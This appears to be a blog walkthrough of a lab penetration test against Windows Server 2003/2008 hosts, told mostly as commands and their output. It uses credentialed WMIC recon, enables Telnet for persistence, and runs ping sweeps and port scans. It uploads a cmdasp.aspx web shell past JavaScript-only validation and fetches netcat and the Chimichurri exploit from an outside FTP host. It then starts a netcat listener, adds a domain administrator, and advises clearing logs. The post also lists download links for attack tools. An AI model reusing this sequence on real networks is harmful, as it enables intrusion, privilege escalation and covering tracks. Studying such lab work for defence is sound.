168          msdtc.exe            8         1040       14           4648960
391          cisvc.exe            8         1128       23           204800
162          dns.exe              8         1176       12           4661248
73           svchost.exe          8         1216       2            2547712
336          inetinfo.exe         8         1268       16           10919936
370          sqlservr.exe         8         1316       29           20021248
57           svchost.exe          8         1416       2            2183168
158          snmp.exe             8         1560       6            5033984
87           sqlbrowser.exe       8         1624       9            3080192
86           winvnc4.exe          8         1760       4            3997696
158          svchost.exe          8         1892       15           5857280
236          svchost.exe          8         2096       25           4702208
97           alg.exe              8         2248       5            3239936
353          wmiprvse.exe         8         2308       7            11517952
121          csrss.exe            13        2596       10           3239936
232          winlogon.exe         13        2624       14           3043328
83           rdpclip.exe          8         2780       4            1298432
366          explorer.exe         8         2880       10           5459968
275          mmc.exe              8         3148       8            3489792
96           cidaemon.exe         4         3232       3            249856
153          cidaemon.exe         4         3304       5            487424
115          cidaemon.exe         4         3340       4            262144
47           notepad.exe          8         2448       2            614400
40           logon.scr            4         276        2            2248704
124          csrss.exe            13        3592       10           19582976
228          winlogon.exe         13        3816       15           3239936
86           rdpclip.exe          8         3964       5            1282048
260          explorer.exe         8         1188       8            3506176
71           cmd.exe              8         3636       2            942080
39           scrnsave.scr         4         3352       2            1798144
136          wmiprvse.exe         8         3712       9            5275648

Local Drives Info

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get description,name,freespace,size
Description              FreeSpace   Name  Size
3 1/2 Inch Floppy Drive              A:
Local Fixed Disk         5958295552  C:    8578932736
CD-ROM Disc              0           D:    623075328

Shares Info

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table
AccessMask  AllowMaximum  Description    InstallDate  MaximumAllowed  Name    Path        Status  Type
            TRUE                                                      FTP     C:\FTP      OK      0
            TRUE          Default share                               C$      C:\         OK      -2147483648
            TRUE          Remote IPC                                  IPC$                OK      -2147483645
            TRUE          Remote Admin                                ADMIN$  C:\WINDOWS  OK      -2147483648

Network Info

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get DefaultIPGateway,DHCPServer,DNSDomain,DNSServerSearchOrder,IPAddress,IPSubnet
DefaultIPGateway  DHCPServer  DNSDomain      DNSServerSearchOrder  IPAddress       IPSubnet
{"10.0.1.65"}     10.0.1.65   lab2           {"10.0.1.68"}         {"10.0.1.75"}   {"255.255.255.192"}
{"10.0.1.137"}    10.0.1.137  lab2-intranet  {"10.0.1.137"}        {"10.0.1.140"}  {"255.255.255.248"}

10.0.1.75 255.255.255.192 Multihomed machine, that’s good sign.

Persistence

Lets try to get a telnet connection

List Services Information

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list


AcceptPause=FALSE
AcceptStop=FALSE
Caption=Application Experience Lookup Service
CheckPoint=0
CreationClassName=Win32_Service
Description=Processes application compatibility lookup requests for applications as they are launched.
DesktopInteract=FALSE
DisplayName=Application Experience Lookup Service
ErrorControl=Normal
ExitCode=0
InstallDate=
Name=AeLookupSvc
PathName=C:\WINDOWS\system32\svchost.exe -k netsvcs
ProcessId=796
ServiceSpecificExitCode=0
ServiceType=Share Process
Started=TRUE
StartMode=Auto
StartName=LocalSystem
State=Running
Status=OK
SystemCreationClassName=Win32_ComputerSystem
SystemName=SERVER-2003
TagId=0
WaitHint=0


AcceptPause=FALSE
AcceptStop=FALSE
Caption=Alerter
CheckPoint=0
CreationClassName=Win32_Service
Description=Notifies selected users and computers of administrative alerts. If the service is stopped, programs that use administrative alerts will not receive them. If this service is disabled, any services that explicitly depend on it will fail to start.
DesktopInteract=FALSE
DisplayName=Alerter
ErrorControl=Normal
ExitCode=1077
InstallDate=
Name=Alerter
PathName=C:\WINDOWS\system32\svchost.exe -k LocalService
ProcessId=0
ServiceSpecificExitCode=0
ServiceType=Share Process
Started=FALSE
StartMode=Disabled
StartName=NT AUTHORITY\LocalService
State=Stopped
Status=OK
SystemCreationClassName=Win32_ComputerSystem
SystemName=SERVER-2003
TagId=0
WaitHint=0

Find a specific Service State

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET State,StartMode
StartMode  State
Disabled   Stopped

Change start mode of service to automatically start upon boot

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL ChangeStartMode Automatic
Executing (\\SERVER-2003\ROOT\CIMV2:Win32_Service.Name="TlntSvr")->ChangeStartMode()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
};

Starting the service

C:\>wmic /node: 10.0.1.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL StartService
Executing (\\SERVER-2003\ROOT\CIMV2:Win32_Service.Name="TlntSvr")->StartService()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
};

Test the connection

*=====================================
Welcome to Microsoft Telnet Server.
*=====================================
C:\Documents and Settings\IWAM_NETASPS>

More Recon & Mapping
Finding new friends to play

Ping Sweep

C:\>FOR /L %i in (1,1,255) do @ping -n 1 10.0.1.%i | find "Reply"
Reply from 10.0.1.65: bytes=32 time=2ms TTL=64
Reply from 10.0.1.66: bytes=32 time=4ms TTL=128
Reply from 10.0.1.68: bytes=32 time=6ms TTL=128
Reply from 10.0.1.75: bytes=32 time<1ms TTL=128
Reply from 10.0.1.137: bytes=32 time=31ms TTL=64
Reply from 10.0.1.138: bytes=32 time<1ms TTL=128
Reply from 10.0.1.140: bytes=32 time<1ms TTL=128

New Hosts Found

10.0.1.66 and 10.0.1.68

Let’s use Nbtstat to gather NetBIOS information

10.0.1.66

C:>nbtstat -a 10.0.1.66

Local Area Connection:
Node IpAddress: [10.0.1.75] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    WINDOWS-7      <00>  UNIQUE      Registered
    LAB2           <00>  GROUP       Registered
    WINDOWS-7      <20>  UNIQUE      Registered
    LAB2           <1E>  GROUP       Registered
    LAB2           <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-0C-29-03-FA-DF


Local Area Connection 2:
Node IpAddress: [10.0.1.140] Scope Id: []

    Host not found.

10.0.1.68

C:\>nbtstat -a 10.0.1.68

Local Area Connection:
Node IpAddress: [10.0.1.75] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    SERVER-2008    <00>  UNIQUE      Registered
    LAB2           <00>  GROUP       Registered
    LAB2           <1C>  GROUP       Registered
    SERVER-2008    <20>  UNIQUE      Registered
    LAB2           <1B>  UNIQUE      Registered

    MAC Address = 00-0C-29-5D-09-FD


Local Area Connection 2:
Node IpAddress: [10.0.1.140] Scope Id: []

    Host not found.

Let’s find out more about IP 10.0.1.68 – SEVER-2008

Port Scan

C:\>FOR /L %i in (1,1,6000) do @netsh.exe diag connect iphost 10.0.1.68 %i | find "[%i]"
   Server appears to be running on port(s) [53]
   Server appears to be running on port(s) [80]
   Server appears to be running on port(s) [88]
   Server appears to be running on port(s) [135]
   Server appears to be running on port(s) [139]
   Server appears to be running on port(s) [389]
   Server appears to be running on port(s) [445]
   Server appears to be running on port(s) [593]
   Server appears to be running on port(s) [636]
   Server appears to be running on port(s) [3268]
   Server appears to be running on port(s) [3389]
   Server appears to be running on port(s) [5357]

Banner Grabbing port 80 with Telnet

C:\>telnet 10.0.1.68 80

HEAD / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 2221
Content-Type: text/html
Last-Modified: Wed, 01 Jun 2011 07:31:37 GMT
Accept-Ranges: bytes
ETag: "2e5fd4f02d20cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 01 Jun 2011 08:44:41 GMT
Connection: close


Connection to host lost.

Check the allowed Options

C:\>telnet 10.0.1.68 80

OPTIONS / HTTP/1.0


HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Wed, 01 Jun 2011 08:45:35 GMT
Connection: close
Content-Length: 0


Connection to host lost.

Connecting to the Server-2003 machine through Remote Desktop and using the browser to get more information



Let’s take a look at the web page source

<form onSubmit=”javascript: return CheckTypes(this, new Array(‘.jpg’, ‘.jpeg’, ‘.gif’, ‘.bmp’), ‘include’);” name=”myform” id=”myform” method=”post” action=”Multiplefilesupload.aspx” encType=”multipart/form-data”>
Select only *.jpg, *.jpeg, *.gif, or *.bmp file:
<input id=”brr” type=”file” name=”file1″>&nbsp;
<input type=”submit” name=”SubmitButton” value=”Upload”>
</form>

Now there is a good idea, using JavaScript for file upload validation

Pivoting
 

Disabling Scripts on the browser

Download cmdasp.aspx from FTP

C:\Documents and Settings\IWAM_NETASPS\Desktop>ftp 172.16.0.3
Connected to 172.16.0.3.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 11:02. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (172.16.0.3:(none)): Bob
331 User Bob OK. Password required
Password:
230-User Bob has group access to:  1001
230 OK. Current directory is /
ftp> get cmdasp.aspx
200 PORT command successful
150 Connecting to port 5001
226-File successfully transferred
226 0.000 seconds (measured here), 10.03 Mbytes per second
ftp: 1442 bytes received in 0.02Seconds 90.13Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 2 kbytes.
221 Logout.

Upload the cmdasp.aspx shell 

 

 

List Installed OS Hotfixes and Service Packs
wmic /output:C:\inetpub\wwwroot\UploadedFiles\hotfixes.htm qfe list

List files in C:\inetpub\wwwroot\UploadedFiles

View hot fixes


Download netcat and Chimichurri

C:\Documents and Settings\IWAM_NETASPS\Desktop>ftp 172.16.0.3
Connected to 172.16.0.3.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 11:02. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (172.16.0.3:(none)): Bob
331 User Bob OK. Password required
Password:
230-User Bob has group access to:  1001
230 OK. Current directory is /
ftp> bin
200 TYPE is now 8-bit binary
ftp> get nc.exe
200 PORT command successful
150-Connecting to port 5001
150 60.0 kbytes to download
226-File successfully transferred
226 0.094 seconds (measured here), 0.63 Mbytes per second
ftp: 61440 bytes received in 0.08Seconds 777.72Kbytes/sec.
ftp> get Chimichurri.exe
200 PORT command successful
150-Connecting to port 5002
150 392.5 kbytes to download
226-File successfully transferred
226 0.679 seconds (measured here), 0.56 Mbytes per second
ftp: 401920 bytes received in 0.70Seconds 571.72Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 0 and downloaded 453 kbytes.
221 Logout.

Upload Chimichurri.exe 


Start a Netcat listener with nc.exe -L -p 5555 and Run Chimichurri 


Add a new User and assign user to the Administrators group 


Check our new User and Password

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\IWAM_NETASPS>systeminfo /S \\10.0.1.68 /U Lab2\iKuppu /P P4$$w0rd

Host Name:                 SERVER-2008
OS Name:                   Microsoftr Windows Serverr 2008 Standard
OS Version:                6.0.6001 Service Pack 1 Build 6001
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                92573-029-0000095-76373
Original Install Date:     5/21/2011, 6:41:14 AM
System Up Time:            2 Days, 18 Hours, 17 Minutes, 17 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 15 Model 2 Stepping 8 GenuineIntel ~2805 Mhz
BIOS Version:              PTLTD  - 6040000
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              pt;Portuguese (Portugal)
Time Zone:                 (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory:     511 MB
Available Physical Memory: 140 MB
Page File: Max Size:       1,513 MB
Page File: Available:      1,170 MB
Page File: In Use:         343 MB
Page File Location(s):     N/A
Domain:                    Lab2.lab
Logon Server:              N/A
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB948609
                           [02]: KB948610
                           [03]: KB956250
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.1.65
                                 IP address(es)
                                 [01]: 10.0.1.68
                                 [02]: fe80::5963:ac2a:6f8b:53e7

Connect with the Remote Desktop



Game Over


Note
Remember to clean up. Clear the logs, remove all the usernames added, remove all the files and tools uploaded, and restore the systems to its initial state.

__________________________________________________________

Tools and exploits used in this scenario

Chimichurri – http://www.argeniss.com/research/Chimichurri.zip
Fpipe v2.1 – http://www.mcafee.com/us/downloads/free-tools/fpipe.aspx
Hydra – http://thc.org/thc-hydra/
John the Ripper – http://www.openwall.com/john//
Web Shell cmdasp.aspx – http://code.google.com/p/fuzzdb/source/browse/trunk/web-backdoors/wbc-v1b/cmdasp.aspx?r=58
Netcat- http://joncraton.org/files/nc111nt.zip
PsExec v1.98 – http://technet.microsoft.com/en-us/sysinternals/bb897553
Samdump2 – http://sourceforge.net/projects/ophcrack/files/samdump2/2.0.1/
Tsql – http://www.freetds.org/

\0

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s